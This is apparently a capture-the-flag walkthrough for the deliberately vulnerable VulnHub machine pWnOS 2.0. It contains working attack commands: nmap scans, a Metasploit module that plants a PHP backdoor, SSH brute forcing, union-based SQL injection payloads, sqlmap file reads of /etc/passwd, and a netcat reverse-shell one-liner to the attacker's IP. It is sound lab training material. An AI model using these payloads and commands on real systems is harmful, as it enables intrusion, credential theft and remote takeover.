Table of contents
introduce
Series: pWnOS (2 units in this series)
Release date: July 4, 2011
Difficulty: Medium
Operating environment: VMware Workstation
Objective: Obtain root privileges
Supplement: The target machine has a static IP, so the network card needs to be configured as 10.10.10.0
Learning:
- host discovery
- Port scanning + vulnerability scanning
- CMS Exploitation
- SQL read and write files
- Sensitive Information Escalation
Target address: https://www.vulnhub.com/entry/pwnos-20-pre-release,34/
collect message
It is already known that the target machine is a static ip: 10.10.10.100
nmap -p- 10.10.10.100
nmap -p22,80 -A 10.10.10.100
nmap -p22,80 --script=vuln 10.10.10.100
website detection
After opening, you may need to log in, first look at the directory found by nmap
What kind of cms is it, I didn’t find it by searching directly
Through the page source code, search out
Vulnerability discovery
I failed to try to run it. I searched online and said that it is enough to install something. I am too lazy to do it. Just msf
It seems that an account was created, and then a php backdoor was uploaded to obtain a session
search Simple PHP Blog 0.4.0
use 0
set rhosts 10.10.10.100
set URI /blog
exploit
Escalation of rights
Search database configuration files
The database configuration file is found, but the database cannot be connected, indicating that the password is wrong. How to solve it?
I searched the system for files with the same name, found them, and successfully connected to the database. Since "ch16" was mentioned in the leaked sensitive files, I queried a user record, and found the password through the online website : killerbeesareflying
SSH blasting
Now that I have got some passwords, I am too lazy to try them one by one, just blast them directly. Unexpectedly, the ssh algorithm of the target machine is a bit old, and hydra cannot blast, so I have to use other tools to blast. The root password obtained by blasting is: root@ISIntS
medusa -M ssh -h 10.10.10.100 -U ./username -P ./pass | grep SUCCESS
2nd style of play
website detection
Entering a single quotation mark in the user name position of the login port will cause an error, so why not use sqlmap?
Sql injection (manual)
order by
Get the number of columns in the current data table
8 is normal, other numbers are wrong, indicating that there are 8 columns
union select
Check which column of data is displayed on the interface. Column 4 can display
- Query the database version, the current database name
- Get the database table name and find that there is only one table: users
email=' union select 1,2,3,group_concat(table_name),5,6,7,8 from information_schema.tables where table_schema=database()--+&pass=1&submit=Login&submitted=TRUE
- View the column names of the table users
email=' union select 1,2,3,group_concat(column_name),5,6,7,8 from information_schema.columns where table_name='users'-- &pass=1&submit=Login&submitted=TRUE
- Get the data in the specified column
email=' union select 1,2,3,group_concat(user_id,0x3a,first_name,0x3a,last_name,0x3a,email,0x3a,pass,0x3a,user_level,0x3a),5,6,7,8 from users-- &pass=1&submit=Login&submitted=TRUE
SQL injection (sqlmap)
It is found that there is sql injection. Although sqlmap has not cracked the password, but through online website query, the password is: killerbeesareflying
sqlmap -r 1.txt --dbs --dump
POST /login.php HTTP/1.1
Host: 10.10.10.100
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Origin: http://10.10.10.100
Connection: close
Referer: http://10.10.10.100/login.php
Cookie: PHPSESSID=0ur4mnc22qt9ue1d0dvu857v74
Upgrade-Insecure-Requests: 1
email=%27&pass=1&submit=Login&submitted=TRUE
read file
Tried it, you can read the file
sqlmap -r 1.txt -v 1 --file-read="/etc/passwd"
Trying to write a file is a bit embarrassing at this time, not sure if the web directory of the target machine is /var/www
, then try to read /var/www/index.php, and confirm the website directory so far.
write to file
It seems that the way of writing is a bit flawed, let’s use it flexibly, anyway, it will not affect the shell
The test found that the nc of the target machine cannot directly play the shell, and the url code is as follows , and the shell is successfully obtained
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.128 4444 >/tmp/f
Let’s demonstrate how sqlmap writes files. It’s strange that I can’t even write in the tmp directory.
sqlmap -r 1.txt --file-write ./1.php --file-dest /tmp/123456.php
Search directly on the target machine, but the uploaded file cannot be found.
Escalation of rights
The way to raise the right is the same as the first style of play, so I won’t repeat it here.
reference
Zero Basics of Hacking Chapter 3 - Web Vulnerabilities in Action - SQL Injection pWnOS: 2.0